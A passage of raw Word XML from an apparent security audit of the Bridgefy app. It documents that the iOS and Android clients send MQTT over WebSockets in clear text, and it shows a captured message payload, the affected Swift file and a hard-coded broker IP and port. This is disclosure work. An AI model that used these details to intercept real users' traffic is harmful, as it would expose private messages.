                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>receiverId</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>\":\"e16e e31e-9aea-44c2-abdb-57d1f3473b01\",\"receiverName\":\"oscaraa\",\"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>receiverNickname\":\"</w:t>
                            </w:r>
                          </w:p>
                          <w:p>
                            <w:pPr>
                              <w:spacing w:before="0"/>
                              <w:ind w:left="0" w:right="-15" w:firstLine="0"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>oscarand\",\"receiverAvatar\":1</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="DE4F00"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>,\"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>message\":\"this-is-a-secret-</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>message</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>\",\"createdOn\":</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape style="width:430.5pt;height:46.9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" id="docshape11" filled="true" fillcolor="#ffff00" stroked="false">
                <w10:anchorlock/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p>
                      <w:pPr>
                        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
                        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:color w:val="DE4F00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>efa6e780d\",\"payload\":{\"</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:b/>
                          <w:color w:val="DE4F00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>senderId</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:color w:val="DE4F00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>\":\"e965dd5f-8df8-4478-b51c-</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:color w:val="DE4F00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>f3ac82fac134\",\"</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:b/>
                          <w:color w:val="DE4F00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>sender Name\":\"Oscar\",\"senderNickname\":\"oscarm\",\"senderAvatar\":7</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:color w:val="DE4F00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>,\"</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:b/>
                          <w:color w:val="DE4F00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>receiverId</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:color w:val="DE4F00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>\":\"e16e e31e-9aea-44c2-abdb-57d1f3473b01\",\"receiverName\":\"oscaraa\",\"</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:b/>
                          <w:color w:val="DE4F00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>receiverNickname\":\"</w:t>
                      </w:r>
                    </w:p>
                    <w:p>
                      <w:pPr>
                        <w:spacing w:before="0"/>
                        <w:ind w:left="0" w:right="-15" w:firstLine="0"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:b/>
                          <w:color w:val="DE4F00"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>oscarand\",\"receiverAvatar\":1</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:color w:val="DE4F00"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>,\"</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:b/>
                          <w:color w:val="DE4F00"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>message\":\"this-is-a-secret-</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:b/>
                          <w:color w:val="DE4F00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>message</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas"/>
                          <w:color w:val="DE4F00"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="18"/>
                        </w:rPr>
                        <w:t>\",\"createdOn\":</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <v:fill type="solid"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="8"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1672433359144,\"status\":1,\"dateSent\":1672433359144}}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"timestamp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:1672433359522}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please note this issue could also be confirmed intercepting traffic and analyzing WebSockets messages using a MitM proxy (i.e. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>BurpSuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>OWASP ZAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Fiddler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cause</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>both</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>apps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>explicitly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>use clear-text MQTT for WebSocket communications with the MQTT broker, which can be confirmed in the following code snippets:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(iOS):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-ios/Bridgefy/MQTT/MQTTManager.swift</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(iOS):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>init(uid: String, token: String) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="1511" w:right="3392" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>websocket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CocoaMQTTWebSocket(uri:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"/mqtt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mqtt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= CocoaMQTT5(clientID: uid,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="3293" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>host: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"3.131.221.30"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="3293" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>port: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>8083,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="3293" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>socket: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>websocket)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="138"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487592448">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>251676</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="20" name="Graphic 20"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="20" name="Graphic 20"/>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9.817009pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15724032;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape12" coordorigin="1440,396" coordsize="2880,0" path="m1440,396l4320,396e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId39">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://portswigger.net/burp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>zap/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.telerik.com/fiddler</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mqtt.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>enableSSL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
